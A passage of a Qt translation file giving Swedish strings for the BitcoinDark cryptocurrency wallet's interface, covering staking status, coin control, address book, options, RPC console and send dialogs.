<translation>&Verifiera meddelande...</translation>
</message>
<message>
<location line="-200"/>
<source>BitcoinDark</source>
<translation>BitcoinDark</translation>
</message>
<message>
<location line="+0"/>
<source>Wallet</source>
<translation>Plånbok</translation>
</message>
<message>
<location line="+178"/>
<source>&About BitcoinDark</source>
<translation>&Om BitcoinDark</translation>
</message>
<message>
<location line="+9"/>
<source>&Show / Hide</source>
<translation>&Visa / Göm</translation>
</message>
<message>
<location line="+9"/>
<source>Unlock wallet</source>
<translation>Lås upp plånbok</translation>
</message>
<message>
<location line="+1"/>
<source>&Lock Wallet</source>
<translation>&Lås plånbok</translation>
</message>
<message>
<location line="+1"/>
<source>Lock wallet</source>
<translation>Lås plånbok</translation>
</message>
<message>
<location line="+34"/>
<source>&File</source>
<translation>&Arkiv</translation>
</message>
<message>
<location line="+8"/>
<source>&Settings</source>
<translation>&Inställningar</translation>
</message>
<message>
<location line="+8"/>
<source>&Help</source>
<translation>&Hjälp</translation>
</message>
<message>
<location line="+9"/>
<source>Tabs toolbar</source>
<translation>Verktygsfält för Tabbar</translation>
</message>
<message>
<location line="+8"/>
<source>Actions toolbar</source>
<translation>Verktygsfält för handlingar</translation>
</message>
<message>
<location line="+13"/>
<location line="+9"/>
<source>[testnet]</source>
<translation>[testnet]</translation>
</message>
<message>
<location line="+0"/>
<location line="+60"/>
<source>BitcoinDark client</source>
<translation>BitcoinDark klient</translation>
</message>
<message numerus="yes">
<location line="+70"/>
<source>%n active connection(s) to BitcoinDark network</source>
<translation><numerusform>%n aktiv anslutning till BitcoinDark nätverket</numerusform><numerusform>%n aktiva anslutning till BitcoinDark nätverket</numerusform></translation>
</message>
<message>
<location line="+40"/>
<source>Downloaded %1 blocks of transaction history.</source>
<translation>Laddade ner %1 block av transaktionshistoriken.</translation>
</message>
<message>
<location line="+413"/>
<source>Staking.<br>Your weight is %1<br>Network weight is %2<br>Expected time to earn reward is %3</source>
<translation>Staking.<br>Din vikt är %1<br>Nätverkets vikt är %2<br>Uppskattad tid för att få belöning är %3</translation>
</message>
<message>
<location line="+6"/>
<source>Not staking because wallet is locked</source>
<translation>Ingen staking för att plånboken är låst</translation>
</message>
<message>
<location line="+2"/>
<source>Not staking because wallet is offline</source>
<translation>Ingen staking för att plånboken är offline</translation>
</message>
<message>
<location line="+2"/>
<source>Not staking because wallet is syncing</source>
<translation>Ingen staking för att plånboken synkroniseras</translation>
</message>
<message>
<location line="+2"/>
<source>Not staking because you don't have mature coins</source>
<translation>Ingen staking för att dina coins är ännu inte föråldrade</translation>
</message>
<message numerus="yes">
<location line="-403"/>
<source>%n second(s) ago</source>
<translation><numerusform>%n sekund sen</numerusform><numerusform>%n sekunder sen</numerusform></translation>
</message>
<message>
<location line="-284"/>
<source>&Unlock Wallet...</source>
<translation>Lås &Upp plånboken</translation>
</message>
<message numerus="yes">
<location line="+288"/>
<source>%n minute(s) ago</source>
<translation><numerusform>%n minut sen</numerusform><numerusform>%n minuter sen</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n hour(s) ago</source>
<translation><numerusform>%n timme sen</numerusform><numerusform>%n timmar sen</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n day(s) ago</source>
<translation><numerusform>%n dag sen</numerusform><numerusform>%n dagar sen</numerusform></translation>
</message>
<message>
<location line="+6"/>
<source>Up to date</source>
<translation>Uppdaterad</translation>
</message>
<message>
<location line="+7"/>
<source>Catching up...</source>
<translation>Hämtar senaste...</translation>
</message>
<message>
<location line="+10"/>
<source>Last received block was generated %1.</source>
<translation>Senaste mottagna block genererades %1.</translation>
</message>
<message>
<location line="+59"/>
<source>This transaction is over the size limit. You can still send it for a fee of %1, which goes to the nodes that process your transaction and helps to support the network. Do you want to pay the fee?</source>
<translation>Denna transaktion är över gränsen. Du kan ändå skicka den med en %1 avgift, som går till noderna som processerar din transaktion och hjälper till med att upprätthålla nätverket. Vill du betala denna avgift?</translation>
</message>
<message>
<location line="+5"/>
<source>Confirm transaction fee</source>
<translation>Bekräfta transaktionsavgiften</translation>
</message>
<message>
<location line="+27"/>
<source>Sent transaction</source>
<translation>Transaktion skickad</translation>
</message>
<message>
<location line="+1"/>
<source>Incoming transaction</source>
<translation>Inkommande transaktion</translation>
</message>
<message>
<location line="+1"/>
<source>Date: %1
Amount: %2
Type: %3
Address: %4
</source>
<translation>Datum: %1
Belopp: %2
Typ: %3
Adress: %4
</translation>
</message>
<message>
<location line="+100"/>
<location line="+15"/>
<source>URI handling</source>
<translation>URI hantering</translation>
</message>
<message>
<location line="-15"/>
<location line="+15"/>
<source>URI can not be parsed! This can be caused by an invalid BitcoinDark address or malformed URI parameters.</source>
<translation>URI:n kan inte tolkas! Detta kan bero på en ogiltig BitcoinDark adress eller felaktiga URI parametrar.</translation>
</message>
<message>
<location line="+18"/>
<source>Wallet is <b>encrypted</b> and currently <b>unlocked</b></source>
<translation>Denna plånbok är <b>krypterad</b> och för närvarande <b>olåst</b></translation>
</message>
<message>
<location line="+10"/>
<source>Wallet is <b>encrypted</b> and currently <b>locked</b></source>
<translation>Denna plånbok är <b>krypterad</b> och för närvarande <b>låst</b></translation>
</message>
<message>
<location line="+25"/>
<source>Backup Wallet</source>
<translation>Säkerhetskopiera plånbok</translation>
</message>
<message>
<location line="+0"/>
<source>Wallet Data (*.dat)</source>
<translation>Plånboksdata (*.dat)</translation>
</message>
<message>
<location line="+3"/>
<source>Backup Failed</source>
<translation>Säkerhetskopieringen misslyckades</translation>
</message>
<message>
<location line="+0"/>
<source>There was an error trying to save the wallet data to the new location.</source>
<translation>Ett fel uppstod vid sparandet av plånboken till den nya platsen.</translation>
</message>
<message numerus="yes">
<location line="+76"/>
<source>%n second(s)</source>
<translation><numerusform>%n sekund</numerusform><numerusform>%n sekunder</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n minute(s)</source>
<translation><numerusform>%n minut</numerusform><numerusform>%n minuter</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n hour(s)</source>
<translation><numerusform>%n timme</numerusform><numerusform>%n timmar</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n day(s)</source>
<translation><numerusform>%n dag</numerusform><numerusform>%n dagar</numerusform></translation>
</message>
<message>
<location line="+18"/>
<source>Not staking</source>
<translation>Ingen staking</translation>
</message>
<message>
<location filename="../bitcoin.cpp" line="+109"/>
<source>A fatal error occurred. BitcoinDark can no longer continue safely and will quit.</source>
<translation>Ett fatalt fel uppstod. BTestcoin kan inte fortsätta och stänger programmet.</translation>
</message>
</context>
<context>
<name>ClientModel</name>
<message>
<location filename="../clientmodel.cpp" line="+90"/>
<source>Network Alert</source>
<translation>Nätverkslarm</translation>
</message>
</context>
<context>
<name>CoinControlDialog</name>
<message>
<location filename="../forms/coincontroldialog.ui" line="+14"/>
<source>Coin Control</source>
<translation>Coin kontroll</translation>
</message>
<message>
<location line="+31"/>
<source>Quantity:</source>
<translation>Antal:</translation>
</message>
<message>
<location line="+32"/>
<source>Bytes:</source>
<translation>Bytes:</translation>
</message>
<message>
<location line="+48"/>
<source>Amount:</source>
<translation>Belopp:</translation>
</message>
<message>
<location line="+32"/>
<source>Priority:</source>
<translation>Prioritet:</translation>
</message>
<message>
<location line="+48"/>
<source>Fee:</source>
<translation>Avgift:</translation>
</message>
<message>
<location line="+35"/>
<source>Low Output:</source>
<translation>Låg utmatning:</translation>
</message>
<message>
<location filename="../coincontroldialog.cpp" line="+551"/>
<source>no</source>
<translation>nej</translation>
</message>
<message>
<location filename="../forms/coincontroldialog.ui" line="+51"/>
<source>After Fee:</source>
<translation>Efter avgift:</translation>
</message>
<message>
<location line="+35"/>
<source>Change:</source>
<translation>Växel:</translation>
</message>
<message>
<location line="+69"/>
<source>(un)select all</source>
<translation>välj/avvälj alla</translation>
</message>
<message>
<location line="+13"/>
<source>Tree mode</source>
<translation>Trädvisning</translation>
</message>
<message>
<location line="+16"/>
<source>List mode</source>
<translation>Listvisning</translation>
</message>
<message>
<location line="+45"/>
<source>Amount</source>
<translation>Mängd</translation>
</message>
<message>
<location line="+5"/>
<source>Label</source>
<translation>Etikett</translation>
</message>
<message>
<location line="+5"/>
<source>Address</source>
<translation>Adress</translation>
</message>
<message>
<location line="+5"/>
<source>Date</source>
<translation>Datum</translation>
</message>
<message>
<location line="+5"/>
<source>Confirmations</source>
<translation>Bekräftelser</translation>
</message>
<message>
<location line="+3"/>
<source>Confirmed</source>
<translation>Bekräftad</translation>
</message>
<message>
<location line="+5"/>
<source>Priority</source>
<translation>Prioritet</translation>
</message>
<message>
<location filename="../coincontroldialog.cpp" line="-515"/>
<source>Copy address</source>
<translation>Kopiera adress</translation>
</message>
<message>
<location line="+1"/>
<source>Copy label</source>
<translation>Kopiera etikett</translation>
</message>
<message>
<location line="+1"/>
<location line="+26"/>
<source>Copy amount</source>
<translation>Kopiera belopp</translation>
</message>
<message>
<location line="-25"/>
<source>Copy transaction ID</source>
<translation>Kopiera transaktions-ID</translation>
</message>
<message>
<location line="+24"/>
<source>Copy quantity</source>
<translation>Kopiera antal</translation>
</message>
<message>
<location line="+2"/>
<source>Copy fee</source>
<translation>Kopiera avgift</translation>
</message>
<message>
<location line="+1"/>
<source>Copy after fee</source>
<translation>Kopiera efter avgift</translation>
</message>
<message>
<location line="+1"/>
<source>Copy bytes</source>
<translation>Kopiera bytes</translation>
</message>
<message>
<location line="+1"/>
<source>Copy priority</source>
<translation>Kopiera prioritet</translation>
</message>
<message>
<location line="+1"/>
<source>Copy low output</source>
<translation>Kopiera låg utmatning</translation>
</message>
<message>
<location line="+1"/>
<source>Copy change</source>
<translation>Kopiera växel</translation>
</message>
<message>
<location line="+317"/>
<source>highest</source>
<translation>högst</translation>
</message>
<message>
<location line="+1"/>
<source>high</source>
<translation>hög</translation>
</message>
<message>
<location line="+1"/>
<source>medium-high</source>
<translation>medium-hög</translation>
</message>
<message>
<location line="+1"/>
<source>medium</source>
<translation>medium</translation>
</message>
<message>
<location line="+4"/>
<source>low-medium</source>
<translation>låg-medium</translation>
</message>
<message>
<location line="+1"/>
<source>low</source>
<translation>låg</translation>
</message>
<message>
<location line="+1"/>
<source>lowest</source>
<translation>lägst</translation>
</message>
<message>
<location line="+155"/>
<source>DUST</source>
<translation>STOFT</translation>
</message>
<message>
<location line="+0"/>
<source>yes</source>
<translation>ja</translation>
</message>
<message>
<location line="+10"/>
<source>This label turns red, if the transaction size is bigger than 10000 bytes.
This means a fee of at least %1 per kb is required.
Can vary +/- 1 Byte per input.</source>
<translation>Denna etikett blir röd om transaktionens storlek är större än 10000 bytes.
Detta betyder att en avgift på minst %1 per kb krävs.
Kan variera +/- 1 byte per ingång.</translation>
</message>
<message>
<location line="+1"/>
<source>Transactions with higher priority get more likely into a block.
This label turns red, if the priority is smaller than "medium".
This means a fee of at least %1 per kb is required.</source>
<translation>Transaktioner med högre prioritet har större sannolikhet att inkluderas i ett block.
Denna etikett blir röd om prioriteten är lägre än "medium".
Detta betyder att en avgift på minst %1 per kb krävs.</translation>
</message>
<message>
<location line="+1"/>
<source>This label turns red, if any recipient receives an amount smaller than %1.
This means a fee of at least %2 is required.
Amounts below 0.546 times the minimum relay fee are shown as DUST.</source>
<translation>Denna etikett blir röd om en mottagare får ett belopp som är mindre än %1.
Detta betyder att en avgift på minst %2 krävs.
Belopp under 0,546 gånger den minsta reläavgiften visas som STOFT.</translation>
</message>
<message>
<location line="+1"/>
<source>This label turns red, if the change is smaller than %1.
This means a fee of at least %2 is required.</source>
<translation>Denna etikett blir röd om växeln är mindre än %1.
Detta betyder att en avgift på minst %2 krävs.</translation>
</message>
<message>
<location line="+37"/>
<location line="+66"/>
<source>(no label)</source>
<translation>(Ingen etikett)</translation>
</message>
<message>
<location line="-9"/>
<source>change from %1 (%2)</source>
<translation>växel från %1 (%2)</translation>
</message>
<message>
<location line="+1"/>
<source>(change)</source>
<translation>(växel)</translation>
</message>
</context>
<context>
<name>EditAddressDialog</name>
<message>
<location filename="../forms/editaddressdialog.ui" line="+14"/>
<source>Edit Address</source>
<translation>Redigera Adress</translation>
</message>
<message>
<location line="+11"/>
<source>&Label</source>
<translation>&Etikett</translation>
</message>
<message>
<location line="+10"/>
<source>The label associated with this address book entry</source>
<translation>Etiketten som är kopplad till detta inlägg i adressboken</translation>
</message>
<message>
<location line="+7"/>
<source>&Address</source>
<translation>&Adress</translation>
</message>
<message>
<location line="+10"/>
<source>The address associated with this address book entry. This can only be modified for sending addresses.</source>
<translation>Adressen som är kopplad till detta inlägg i adressboken. Denna kan endast ändras för avsändaradresser.</translation>
</message>
<message>
<location filename="../editaddressdialog.cpp" line="+20"/>
<source>New receiving address</source>
<translation>Ny mottagaradress</translation>
</message>
<message>
<location line="+4"/>
<source>New sending address</source>
<translation>Ny avsändaradress</translation>
</message>
<message>
<location line="+3"/>
<source>Edit receiving address</source>
<translation>Redigera mottagaradress</translation>
</message>
<message>
<location line="+4"/>
<source>Edit sending address</source>
<translation>Redigera avsändaradress</translation>
</message>
<message>
<location line="+76"/>
<source>The entered address "%1" is already in the address book.</source>
<translation>Den angivna adressen "%1" finns redan i adressboken.</translation>
</message>
<message>
<location line="-5"/>
<source>The entered address "%1" is not a valid BitcoinDark address.</source>
<translation>Den angivna adressen "%1" är inte en giltig BitcoinDark-adress.</translation>
</message>
<message>
<location line="+10"/>
<source>Could not unlock wallet.</source>
<translation>Plånboken kunde inte låsas upp.</translation>
</message>
<message>
<location line="+5"/>
<source>New key generation failed.</source>
<translation>Misslyckades med generering av ny nyckel.</translation>
</message>
</context>
<context>
<name>GUIUtil::HelpMessageBox</name>
<message>
<location filename="../guiutil.cpp" line="+420"/>
<location line="+12"/>
<source>BitcoinDark-Qt</source>
<translation>BitcoinDark-Qt</translation>
</message>
<message>
<location line="-12"/>
<source>version</source>
<translation>version</translation>
</message>
<message>
<location line="+2"/>
<source>Usage:</source>
<translation>Användning:</translation>
</message>
<message>
<location line="+1"/>
<source>command-line options</source>
<translation>Kommandoradsalternativ</translation>
</message>
<message>
<location line="+4"/>
<source>UI options</source>
<translation>UI-alternativ</translation>
</message>
<message>
<location line="+1"/>
<source>Set language, for example "de_DE" (default: system locale)</source>
<translation>Ställ in språk, t.ex. "de_DE" (förval: systemets språk)</translation>
</message>
<message>
<location line="+1"/>
<source>Start minimized</source>
<translation>Starta som minimerad</translation>
</message>
<message>
<location line="+1"/>
<source>Show splash screen on startup (default: 1)</source>
<translation>Visa startbild vid uppstart (förval: 1)</translation>
</message>
</context>
<context>
<name>OptionsDialog</name>
<message>
<location filename="../forms/optionsdialog.ui" line="+14"/>
<source>Options</source>
<translation>Alternativ</translation>
</message>
<message>
<location line="+16"/>
<source>&Main</source>
<translation>&Allmänt</translation>
</message>
<message>
<location line="+6"/>
<source>Optional transaction fee per kB that helps make sure your transactions are processed quickly. Most transactions are 1 kB. Fee 0.01 recommended.</source>
<translation>Valfri transaktionsavgift per kB som försäkrar att transaktionen behandlas snabbt. De flesta transaktionerna är 1 kB. En avgift på 0,01 är rekommenderad.</translation>
</message>
<message>
<location line="+15"/>
<source>Pay transaction &fee</source>
<translation>Betala överförings&avgift</translation>
</message>
<message>
<location line="+31"/>
<source>Reserved amount does not participate in staking and is therefore spendable at any time.</source>
<translation>Reserverad mängd deltar inte i stake-processen och kan därför spenderas när som helst.</translation>
</message>
<message>
<location line="+15"/>
<source>Reserve</source>
<translation>Reservera</translation>
</message>
<message>
<location line="+31"/>
<source>Automatically start BitcoinDark after logging in to the system.</source>
<translation>Starta BitcoinDark automatiskt efter inloggning i systemet.</translation>
</message>
<message>
<location line="+3"/>
<source>&Start BitcoinDark on system login</source>
<translation>&Starta BitcoinDark vid inloggning</translation>
</message>
<message>
<location line="+7"/>
<source>Detach block and address databases at shutdown. This means they can be moved to another data directory, but it slows down shutdown. The wallet is always detached.</source>
<translation>Koppla ifrån block- och adressdatabaserna vid nedstängning. Detta betyder att de kan flyttas till en annan datakatalog, men det saktar ner avstängningen. Plånboken är alltid frånkopplad.</translation>
</message>
<message>
<location line="+3"/>
<source>&Detach databases at shutdown</source>
<translation>Koppla bort &databaserna vid nedstängning</translation>
</message>
<message>
<location line="+21"/>
<source>&Network</source>
<translation>&Nätverk</translation>
</message>
<message>
<location line="+6"/>
<source>Automatically open the BitcoinDark client port on the router. This only works when your router supports UPnP and it is enabled.</source>
<translation>Öppna automatiskt BitcoinDark-klientens port på routern. Detta fungerar endast om din router stödjer UPnP och det är aktiverat.</translation>
</message>
<message>
<location line="+3"/>
<source>Map port using &UPnP</source>
<translation>Tilldela port med hjälp av &UPnP</translation>
</message>
<message>
<location line="+7"/>
<source>Connect to the BitcoinDark network through a SOCKS proxy (e.g. when connecting through Tor).</source>
<translation>Anslut till BitcoinDark-nätverket via en SOCKS-proxy (t.ex. när du ansluter genom Tor).</translation>
</message>
<message>
<location line="+3"/>
<source>&Connect through SOCKS proxy:</source>
<translation>&Anslut genom en SOCKS-proxy:</translation>
</message>
<message>
<location line="+9"/>
<source>Proxy &IP:</source>
<translation>Proxy-&IP: </translation>
</message>
<message>
<location line="+19"/>
<source>IP address of the proxy (e.g. 127.0.0.1)</source>
<translation>Proxyns IP-adress (t.ex. 127.0.0.1)</translation>
</message>
<message>
<location line="+7"/>
<source>&Port:</source>
<translation>&Port: </translation>
</message>
<message>
<location line="+19"/>
<source>Port of the proxy (e.g. 9050)</source>
<translation>Proxyns port (t.ex. 9050)</translation>
</message>
<message>
<location line="+7"/>
<source>SOCKS &Version:</source>
<translation>SOCKS &Version:</translation>
</message>
<message>
<location line="+13"/>
<source>SOCKS version of the proxy (e.g. 5)</source>
<translation>Proxyns SOCKS-version (t.ex. 5)</translation>
</message>
<message>
<location line="+36"/>
<source>&Window</source>
<translation>&Fönster</translation>
</message>
<message>
<location line="+6"/>
<source>Show only a tray icon after minimizing the window.</source>
<translation>Visa endast en systemfältsikon vid minimering.</translation>
</message>
<message>
<location line="+3"/>
<source>&Minimize to the tray instead of the taskbar</source>
<translation>&Minimera till systemfältet istället för aktivitetsfältet</translation>
</message>
<message>
<location line="+7"/>
<source>Minimize instead of exit the application when the window is closed. When this option is enabled, the application will be closed only after selecting Quit in the menu.</source>
<translation>Minimera applikationen istället för att stänga ner den när fönstret stängs. När detta alternativ är aktiverat stängs programmet endast efter att du valt Avsluta i menyn.</translation>
</message>
<message>
<location line="+3"/>
<source>M&inimize on close</source>
<translation>M&inimera vid stängning</translation>
</message>
<message>
<location line="+21"/>
<source>&Display</source>
<translation>&Visa</translation>
</message>
<message>
<location line="+8"/>
<source>User Interface &language:</source>
<translation>Användargränssnittets &språk: </translation>
</message>
<message>
<location line="+13"/>
<source>The user interface language can be set here. This setting will take effect after restarting BitcoinDark.</source>
<translation>Användargränssnittets språk kan ställas in här. Inställningen börjar gälla efter omstart av BitcoinDark.</translation>
</message>
<message>
<location line="+11"/>
<source>&Unit to show amounts in:</source>
<translation>&Måttenhet att visa belopp i: </translation>
</message>
<message>
<location line="+13"/>
<source>Choose the default subdivision unit to show in the interface and when sending coins.</source>
<translation>Välj standardenheten som ska visas i gränssnittet och när du skickar mynt.</translation>
</message>
<message>
<location line="+9"/>
<source>Whether to show BitcoinDark addresses in the transaction list or not.</source>
<translation>Om BitcoinDark-adresser skall visas i transaktionslistan eller inte.</translation>
</message>
<message>
<location line="+3"/>
<source>&Display addresses in transaction list</source>
<translation>&Visa adresser i transaktionslistan</translation>
</message>
<message>
<location line="+7"/>
<source>Whether to show coin control features or not.</source>
<translation>Om coin-kontrollinställningar skall visas eller inte.</translation>
</message>
<message>
<location line="+3"/>
<source>Display coin &control features (experts only!)</source>
<translation>Visa coin-kontrollinställningar (endast avancerade användare!)</translation>
</message>
<message>
<location line="+71"/>
<source>&OK</source>
<translation>&OK</translation>
</message>
<message>
<location line="+7"/>
<source>&Cancel</source>
<translation>&Avbryt</translation>
</message>
<message>
<location line="+10"/>
<source>&Apply</source>
<translation>&Verkställ</translation>
</message>
<message>
<location filename="../optionsdialog.cpp" line="+55"/>
<source>default</source>
<translation>standard</translation>
</message>
<message>
<location line="+149"/>
<location line="+9"/>
<source>Warning</source>
<translation>Varning</translation>
</message>
<message>
<location line="-9"/>
<location line="+9"/>
<source>This setting will take effect after restarting BitcoinDark.</source>
<translation>Inställningen börjar gälla efter omstart av BitcoinDark.</translation>
</message>
<message>
<location line="+29"/>
<source>The supplied proxy address is invalid.</source>
<translation>Den angivna proxyadressen är ogiltig.</translation>
</message>
</context>
<context>
<name>OverviewPage</name>
<message>
<location filename="../forms/overviewpage.ui" line="+14"/>
<source>Form</source>
<translation>Formulär</translation>
</message>
<message>
<location line="+33"/>
<location line="+231"/>
<source>The displayed information may be out of date. Your wallet automatically synchronizes with the BitcoinDark network after a connection is established, but this process has not completed yet.</source>
<translation>Den visade informationen kan vara inaktuell. Din plånbok synkroniseras automatiskt med BitcoinDark-nätverket efter att en anslutning har upprättats, men denna process är inte färdig ännu.</translation>
</message>
<message>
<location line="-160"/>
<source>Stake:</source>
<translation>Stake:</translation>
</message>
<message>
<location line="+29"/>
<source>Unconfirmed:</source>
<translation>Obekräftat:</translation>
</message>
<message>
<location line="-107"/>
<source>Wallet</source>
<translation>Plånbok</translation>
</message>
<message>
<location line="+49"/>
<source>Spendable:</source>
<translation>Spenderbart:</translation>
</message>
<message>
<location line="+16"/>
<source>Your current spendable balance</source>
<translation>Ditt tillgängliga saldo</translation>
</message>
<message>
<location line="+71"/>
<source>Immature:</source>
<translation>Omogen:</translation>
</message>
<message>
<location line="+13"/>
<source>Mined balance that has not yet matured</source>
<translation>Den genererade balansen som ännu inte har mognat</translation>
</message>
<message>
<location line="+20"/>
<source>Total:</source>
<translation>Totalt:</translation>
</message>
<message>
<location line="+16"/>
<source>Your current total balance</source>
<translation>Ditt nuvarande totala saldo</translation>
</message>
<message>
<location line="+46"/>
<source><b>Recent transactions</b></source>
<translation><b>Nyligen genomförda transaktioner</b></translation>
</message>
<message>
<location line="-108"/>
<source>Total of transactions that have yet to be confirmed, and do not yet count toward the current balance</source>
<translation>Summan av transaktioner som ännu inte har bekräftats och som ännu inte räknas med i det aktuella saldot</translation>
</message>
<message>
<location line="-29"/>
<source>Total of coins that was staked, and do not yet count toward the current balance</source>
<translation>Summan av coins som är i stake-processen och som ännu inte räknas med i det aktuella saldot</translation>
</message>
<message>
<location filename="../overviewpage.cpp" line="+113"/>
<location line="+1"/>
<source>out of sync</source>
<translation>osynkroniserad</translation>
</message>
</context>
<context>
<name>QRCodeDialog</name>
<message>
<location filename="../forms/qrcodedialog.ui" line="+14"/>
<source>QR Code Dialog</source>
<translation>QR-kodsdialog</translation>
</message>
<message>
<location line="+59"/>
<source>Request Payment</source>
<translation>Begär Betalning</translation>
</message>
<message>
<location line="+56"/>
<source>Amount:</source>
<translation>Belopp:</translation>
</message>
<message>
<location line="-44"/>
<source>Label:</source>
<translation>Etikett:</translation>
</message>
<message>
<location line="+19"/>
<source>Message:</source>
<translation>Meddelande:</translation>
</message>
<message>
<location line="+71"/>
<source>&Save As...</source>
<translation>&Spara Som...</translation>
</message>
<message>
<location filename="../qrcodedialog.cpp" line="+62"/>
<source>Error encoding URI into QR Code.</source>
<translation>Fel vid skapande av QR-kod från URI.</translation>
</message>
<message>
<location line="+40"/>
<source>The entered amount is invalid, please check.</source>
<translation>Den angivna mängden är felaktig, var vänlig kontrollera.</translation>
</message>
<message>
<location line="+23"/>
<source>Resulting URI too long, try to reduce the text for label / message.</source>
<translation>URI:n är för lång, försök minska texten för etikett / meddelande.</translation>
</message>
<message>
<location line="+25"/>
<source>Save QR Code</source>
<translation>Spara QR-kod</translation>
</message>
<message>
<location line="+0"/>
<source>PNG Images (*.png)</source>
<translation>PNG-bilder (*.png)</translation>
</message>
</context>
<context>
<name>RPCConsole</name>
<message>
<location filename="../forms/rpcconsole.ui" line="+46"/>
<source>Client name</source>
<translation>Klientnamn</translation>
</message>
<message>
<location line="+10"/>
<location line="+23"/>
<location line="+26"/>
<location line="+23"/>
<location line="+23"/>
<location line="+36"/>
<location line="+53"/>
<location line="+23"/>
<location line="+23"/>
<location filename="../rpcconsole.cpp" line="+348"/>
<source>N/A</source>
<translation>ej tillgänglig</translation>
</message>
<message>
<location line="-217"/>
<source>Client version</source>
<translation>Klientversion</translation>
</message>
<message>
<location line="-45"/>
<source>&Information</source>
<translation>&Information</translation>
</message>
<message>
<location line="+68"/>
<source>Using OpenSSL version</source>
<translation>Använder OpenSSL version</translation>
</message>
<message>
<location line="+49"/>
<source>Startup time</source>
<translation>Uppstartstid</translation>
</message>
<message>
<location line="+29"/>
<source>Network</source>
<translation>Nätverk</translation>
</message>
<message>
<location line="+7"/>
<source>Number of connections</source>
<translation>Antalet anslutningar</translation>
</message>
<message>
<location line="+23"/>
<source>On testnet</source>
<translation>På testnet</translation>
</message>
<message>
<location line="+23"/>
<source>Block chain</source>
<translation>Blockkedja</translation>
</message>
<message>
<location line="+7"/>
<source>Current number of blocks</source>
<translation>Aktuellt antal block</translation>
</message>
<message>
<location line="+23"/>
<source>Estimated total blocks</source>
<translation>Uppskattat totalt antal block</translation>
</message>
<message>
<location line="+23"/>
<source>Last block time</source>
<translation>Senaste blocktid</translation>
</message>
<message>
<location line="+52"/>
<source>&Open</source>
<translation>&Öppna</translation>
</message>
<message>
<location line="+16"/>
<source>Command-line options</source>
<translation>Kommandoradsalternativ</translation>
</message>
<message>
<location line="+7"/>
<source>Show the BitcoinDark-Qt help message to get a list with possible BitcoinDark command-line options.</source>
<translation>Visa BitcoinDark-Qt-hjälpmeddelandet för att få en lista över möjliga BitcoinDark-kommandoradsalternativ.</translation>
</message>
<message>
<location line="+3"/>
<source>&Show</source>
<translation>&Visa</translation>
</message>
<message>
<location line="+24"/>
<source>&Console</source>
<translation>&Konsol</translation>
</message>
<message>
<location line="-260"/>
<source>Build date</source>
<translation>Kompileringsdatum</translation>
</message>
<message>
<location line="-104"/>
<source>BitcoinDark - Debug window</source>
<translation>BitcoinDark - Felsökningsfönster</translation>
</message>
<message>
<location line="+25"/>
<source>BitcoinDark Core</source>
<translation>BitcoinDark Core</translation>
</message>
<message>
<location line="+279"/>
<source>Debug log file</source>
<translation>Debugloggfil</translation>
</message>
<message>
<location line="+7"/>
<source>Open the BitcoinDark debug log file from the current data directory. This can take a few seconds for large log files.</source>
<translation>Öppna BitcoinDark-felsökningsloggfilen från den nuvarande datakatalogen. Detta kan ta ett par sekunder för stora loggfiler.</translation>
</message>
<message>
<location line="+102"/>
<source>Clear console</source>
<translation>Rensa konsolen</translation>
</message>
<message>
<location filename="../rpcconsole.cpp" line="-33"/>
<source>Welcome to the BitcoinDark RPC console.</source>
<translation>Välkommen till BitcoinDark RPC-konsolen.</translation>
</message>
<message>
<location line="+1"/>
<source>Use up and down arrows to navigate history, and <b>Ctrl-L</b> to clear screen.</source>
<translation>Använd upp- och ner-pilarna för att navigera i historiken, och <b>Ctrl-L</b> för att rensa skärmen.</translation>
</message>
<message>
<location line="+1"/>
<source>Type <b>help</b> for an overview of available commands.</source>
<translation>Skriv <b>help</b> för en översikt av alla kommandon.</translation>
</message>
</context>
<context>
<name>SendCoinsDialog</name>
<message>
<location filename="../forms/sendcoinsdialog.ui" line="+14"/>
<location filename="../sendcoinsdialog.cpp" line="+182"/>
<location line="+5"/>
<location line="+5"/>
<location line="+5"/>
<location line="+6"/>
<location line="+5"/>
<location line="+5"/>
<source>Send Coins</source>
<translation>Skicka pengar</translation>
</message>
<message>
<location line="+76"/>
<source>Coin Control Features</source>
<translation>Coin-kontrollinställningar</translation>
</message>
<message>
<location line="+20"/>
<source>Inputs...</source>
<translation>Ingångar...</translation>
</message>
<message>
<location line="+7"/>
<source>automatically selected</source>
<translation>automatiskt valda</translation>
</message>
<message>
<location line="+19"/>
<source>Insufficient funds!</source>
<translation>Otillräckligt saldo!</translation>
</message>
<message>
<location line="+77"/>
<source>Quantity:</source>
<translation>Antal:</translation>
</message>
<message>
<location line="+22"/>
<location line="+35"/>
<source>0</source>
<translation>0</translation>
</message>
<message>
<location line="-19"/>
<source>Bytes:</source>
<translation>Bytes:</translation>
</message>
<message>
<location line="+51"/>
<source>Amount:</source>
<translation>Belopp:</translation>
</message>
<message>
<location line="+22"/>
<location line="+86"/>
<location line="+86"/>
<location line="+32"/>
<source>0.00 BC</source>
<translation>0.00 BC</translation>
</message>
<message>
<location line="-191"/>
<source>Priority:</source>
<translation>Prioritet:</translation>
</message>
<message>
<location line="+19"/>
<source>medium</source>
<translation>medium</translation>
</message>
<message>
<location line="+32"/>
<source>Fee:</source>
<translation>Avgift:</translation>
</message>
<message>
<location line="+35"/>
<source>Low Output:</source>
<translation>Låg utmatning:</translation>
</message>
<message>
<location line="+19"/>
<source>no</source>
<translation>nej</translation>
</message>
<message>
<location line="+32"/>
<source>After Fee:</source>
<translation>Efter avgift:</translation>
</message>
<message>
<location line="+35"/>
<source>Change</source>
<translation>Växel</translation>
</message>
<message>
<location line="+50"/>
<source>custom change address</source>
<translation>egen växeladress</translation>
</message>
<message>
<location line="+106"/>
<source>Send to multiple recipients at once</source>
<translation>Skicka till flera mottagare samtidigt</translation>
</message>
<message>
<location line="+3"/>
<source>Add &Recipient</source>
<translation>Lägg till &mottagare</translation>
</message>
<message>
<location line="+20"/>
<source>Remove all transaction fields</source>
<translation>Ta bort alla transaktionsfält</translation>
</message>
<message>
<location line="+3"/>
<source>Clear &All</source>
<translation>Rensa &alla</translation>
</message>
<message>
<location line="+28"/>
<source>Balance:</source>
<translation>Saldo:</translation>
</message>
<message>
<location line="+16"/>
<source>123.456 BC</source>
<translation>123.456 BC</translation>
</message>
<message>
<location line="+31"/>
<source>Confirm the send action</source>
